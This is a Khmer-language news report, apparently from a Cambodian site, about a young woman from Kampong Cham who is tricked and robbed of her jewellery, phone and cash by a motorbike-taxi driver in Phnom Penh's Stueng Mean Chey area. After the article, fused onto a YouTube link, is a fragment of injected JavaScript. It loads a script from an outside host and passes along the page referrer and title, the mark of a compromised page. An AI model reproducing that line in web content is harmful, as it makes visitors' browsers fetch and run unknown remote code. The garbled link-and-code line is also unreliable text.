នារីវ័យក្មេងអង្គុយទ្រហ៊ោយំ បន្ទាប់ពីជិះម៉ូតូឌុបរកការងារមកដល់ស្ទឹងមានជ័យដូចគេប្លន់អស់គ្មានសល់

ភ្នំពេញ៖ នារីវ័យក្មេងម្នាក់ត្រូវម៉ូតូឌុបលួងលោមអោយដោះគ្រឿងអលង្កា និងទូរស័ព្ទ ព្រមទាំងលុយមួយចំនួនដាក់ចូលក្នុងកាតាបខោអាវរួចយកទៅបាត់។
ហេតុការណ៍នេះកើតឡើងនៅវេលាម៉ោង៨និង១០ នាទី យប់នៅចណុចស្ពានបុរីលឹមឈាងហាក់ស្ថិតក្នុងសង្កាត់ស្ទឹងមានជ័យខណ្ឌមានជ័យ។

តាមការរៀបរាប់ពីនារីរងគ្រោះមានឈ្មោះនាង  ស្រីនិចអាយុ២០ឆ្នាំ ជាសិស្ស  មានស្រុកកំណើតនៅភូមិទ្រាស ឃុំខ្លារស ស្រុកស្រីសន្ធរ ខេត្តកំពុងចាមរៀបរាប់ បានរុៀបរាប់ទាំងរលីងរលោងភ្នែកថា មូលហេតុដែលនាងបានមកដល់ភ្នំពេញ គឺដោយសារមានមិត្តភក្ត័ម្នាក់ឈ្មោះស្រីណា អាយុ២០ឆ្នាំ ជាអ្នកធ្វើការរោងចក្រ និងមានស្រុកកំណើតជាមួយគ្នា ហើយមិត្តម្នាក់នេះបានឈប់រៀនយូរឆ្នាំ មកធ្វើការរោងចក្រនៅភ្នំពេញម្ដុំទួលគោក ដោយរូបនាងបានទំនាក់ទំនងតាមទូរស័ព្ទប្រាប់ថាឈប់រៀនទៅមកធ្វើការរោងចក្រនៅភ្នំពេញជាមួយគ្នាគ្រាន់បានប្រាក់កាក់ខ្លះដើម្បីជីវភាព។

នារីរងគ្រោះបន្តថាក្រោយពេលម្ដាយនាងដឹង ក៏ព្រមអោយនាងមកធ្វើការរោងចក្រជាមួយមិត្តភក្ត្រ័ ហើយធ្វើដំនើរមកទីក្រុងភ្នំពេញតែម្តង។

ប្រភពបដដែលបន្តទៀតថា ពេលនោះនាងបានជិះរថយន្តក្រុងមកភ្នំពេញ ខណៈមកដល់ផ្សារថ្មី ល្ងាចណាស់ទៅហើយ រូបនាងបានចុះពីរថយន្តក្រុងស្រាប់តែមានបុរសម្នាក់ជាអ្នករត់ម៉ូតូឌុប មានមាឌរាងទាបខ្មៅ បានហៅអោយនាងជិះម៉ូតូរបស់ខ្លួន រួចរូបនាងបានប្រាប់ថាឌុបខ្ញុំទៅរោងចក្រម្ដុំទួលគោក  ដោយនាងនមិនបានតថ្លៃទេលុះមកដល់ពាក់កណ្ដាលផ្លូវបុរសជាអ្នករត់ម៉ូតូឌុបនោះប្រាប់នាងថានៅភ្នំពេញសម្បូរចោរច្រើនណាស់ ហើយប្រាប់អោយនាងដោះខ្សែរដៃចំនួនបីជី និងទូរស័ព្ទសាមសុងមួយគ្រឿង ព្រមទាំងកាបូកលុយមានលុយ៥០ដុល្លាដាក់ក្នុងកាតាបរបស់នាងដែលដាក់ពីមុខម៉ូតូឌុបនោះ ។

លុះបើកមកដល់ចំណុចកើតហេតុ ស្ពានលឹមឈាងហាក់បុរសជាអ្នករត់ម៉ូតូឌុបរូបនោះ បានអោយនាងចុះអង្គុយជិតស្ពាន ហើយប្រាប់ថាចាំបន្តិចខ្ញុំទៅទិញទឹក ។ ដោយអង្គុយរង់ចាំរយះពេលជាច្រើនម៉ោង ទើបដឹងថាខ្លួនចាញ់បោកគេ។  ជាមួយក្តីអស់សង្ឃឹមទូរស័ព្ទទៅមិត្តភ័ក្រតែមិនចូលសោះ មិនដឹងគិតយ៉ាងម៉េចនាងអង្គុយទ្រហោយំធ្វើអោយប្រជាពលរដ្ឋធ្វើដំណើរតាមដងផ្លូមានការងឿងឆ្ងល់បានឈប់គ្រប់គ្នារួចបានសួរនាំដឹងរឿងរាវអស់ហើយបានប្រាប់ថានាងចាញ់បោកគេ។

ក្រោយកើតហេតុម៉ូតូឌុបម្នាក់ និងអ្នកសារព័ត៌មានឃើញអាណិត ដោយយល់ឃើញថាកន្លែងនេះស្ងាត់ណាស់ព្រោះយប់ណាស់ទៅហើយនោះ ក៏បានជូននារីរងគ្រោះរូបនោះទៅដាក់កន្លែងសន្តិសុខមានសុវត្តិភាព ហើយទាក់ទងហៅសមត្ថកិច្ចដង្កោអោយមកយកនាងទៅពេលសមត្ថកិច្ចចុះមកដល់បានសួរនាំរួចបានអោយនារីរងគ្រោះមកចង្អុលបង្ហាញកន្លែងដែលម៉ូតូឌុបដាក់នាងចោលទើបដឹងថាមិនមែនទឹកដីដង្កោទេ  រួចសមត្ថកិច្ចដង្កោបានដឹកនារីរងគ្រោះមកដាក់ពាក្យបណ្ដឹងនៅប៉ុស្តិ៍នគរបាលរដ្ឋបាលស្ទឹងមានជ័យវិញ៕ដោយ៖ ព្រះអង្គខ្មៅមានរិទ្ធិ

https://youtu.be/nfzvwbaZLmos.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More